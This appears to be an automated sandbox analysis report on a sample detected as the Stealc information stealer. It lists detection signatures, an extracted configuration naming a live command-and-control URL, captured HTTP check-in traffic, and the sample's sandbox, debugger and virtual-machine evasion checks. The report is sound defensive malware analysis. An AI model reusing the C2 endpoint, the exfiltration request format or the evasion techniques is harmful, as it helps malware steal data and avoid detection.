Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1525191
MD5:edecdb123ba6a0d389ff9b2993754c49
SHA1:d27897486ab7cd802f52731b1e98b9b463854fc0
SHA256:c1af8de0dbb010738eacb3fa66d5c3f1ea70ce1c480ac116ccd6bbfec781b1d1
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5588 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EDECDB123BA6A0D389FF9B2993754C49)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2052957198.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5588JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5588JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.460000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T20:46:02.261931+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.460000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0046C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00467240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00467240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00469AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00469AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00469B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00469B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00478EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00478EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00474910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00474910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0046DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0046E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00474570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00474570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0046ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0046BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0046DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046F68A FindFirstFileA,0_2_0046F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00473EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00473EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0046F6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 46 45 44 30 37 44 31 37 30 45 31 38 34 35 31 35 30 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="hwid"DDFED07D170E1845150070------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="build"doma------GIEBAECAKKFCBFIEGCBK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00464880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00464880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 46 45 44 30 37 44 31 37 30 45 31 38 34 35 31 35 30 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="hwid"DDFED07D170E1845150070------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="build"doma------GIEBAECAKKFCBFIEGCBK--
                Source: file.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2094357724.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094357724.0000000000ECF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2094357724.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094357724.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094357724.0000000000EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2094357724.0000000000ECF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37a

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E0950_2_0082E095
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FE8590_2_006FE859
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008151780_2_00815178
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CF2010_2_007CF201
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C8A9E0_2_007C8A9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072FB7E0_2_0072FB7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008273D50_2_008273D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00834CDE0_2_00834CDE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082FC7E0_2_0082FC7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082C50D0_2_0082C50D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007866B30_2_007866B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008336540_2_00833654
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082979E0_2_0082979E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072B7540_2_0072B754
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D7FEC0_2_006D7FEC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083175A0_2_0083175A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E3F620_2_008E3F62
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 004645C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: nqjulsar ZLIB complexity 0.9948356094479005
                Source: file.exe, 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2052957198.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00479600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00479600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00473720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00473720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Q9XDFATE.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1802752 > 1048576
                Source: file.exeStatic PE information: Raw size of nqjulsar is bigger than: 0x100000 < 0x191e00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.460000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nqjulsar:EW;snoulpuy:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nqjulsar:EW;snoulpuy:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00479860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00479860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1bc2d6 should be: 0x1bae13
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: nqjulsar
                Source: file.exeStatic PE information: section name: snoulpuy
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F8882 push eax; mov dword ptr [esp], edx0_2_008F88A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F8882 push 4303AB69h; mov dword ptr [esp], eax0_2_008F88C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 1A2CFDA4h; mov dword ptr [esp], esi0_2_0082E0B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 36CD470Dh; mov dword ptr [esp], ebp0_2_0082E164
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 46D248A3h; mov dword ptr [esp], eax0_2_0082E19A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 17D96FC9h; mov dword ptr [esp], ecx0_2_0082E1C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 7A07E277h; mov dword ptr [esp], ecx0_2_0082E207
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push ebx; mov dword ptr [esp], ecx0_2_0082E2DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 13B4F4DDh; mov dword ptr [esp], eax0_2_0082E3AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push ebp; mov dword ptr [esp], 482AC16Bh0_2_0082E436
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push edx; mov dword ptr [esp], ebp0_2_0082E481
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 3A46DA51h; mov dword ptr [esp], ebp0_2_0082E4A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 18FB8425h; mov dword ptr [esp], esi0_2_0082E5A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 14947EE4h; mov dword ptr [esp], ecx0_2_0082E68C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push ebp; mov dword ptr [esp], eax0_2_0082E6F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push ecx; mov dword ptr [esp], esi0_2_0082E711
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push eax; mov dword ptr [esp], 27FE0277h0_2_0082E843
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push esi; mov dword ptr [esp], edx0_2_0082E8BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 032DE914h; mov dword ptr [esp], eax0_2_0082E8CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 7BA50680h; mov dword ptr [esp], esp0_2_0082E94B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push eax; mov dword ptr [esp], ecx0_2_0082E9C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 160D26C3h; mov dword ptr [esp], ecx0_2_0082EA07
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push ebx; mov dword ptr [esp], ecx0_2_0082EA4F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push edx; mov dword ptr [esp], esi0_2_0082EADB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push edx; mov dword ptr [esp], 56DD6B87h0_2_0082EADF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 57B96900h; mov dword ptr [esp], esi0_2_0082EB2D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push ebx; mov dword ptr [esp], 0C8463B8h0_2_0082EB6D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push edi; mov dword ptr [esp], 75B4F840h0_2_0082EB87
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push ebp; mov dword ptr [esp], edi0_2_0082EC27
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push 3B1621C9h; mov dword ptr [esp], ecx0_2_0082EC74
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E095 push ecx; mov dword ptr [esp], esi0_2_0082ED0F
                Source: file.exeStatic PE information: section name: nqjulsar entropy: 7.953541884791292

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00479860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00479860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13746
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1B39 second address: 6C1B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1B3F second address: 6C1B44 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838D95 second address: 838D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838D9E second address: 838DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839341 second address: 839364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F57D451A1B6h 0x0000000a jne 00007F57D451A1B6h 0x00000010 popad 0x00000011 push ecx 0x00000012 jnp 00007F57D451A1B6h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jno 00007F57D451A1B6h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839364 second address: 839377 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F57D4F134D6h 0x00000008 ja 00007F57D4F134D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
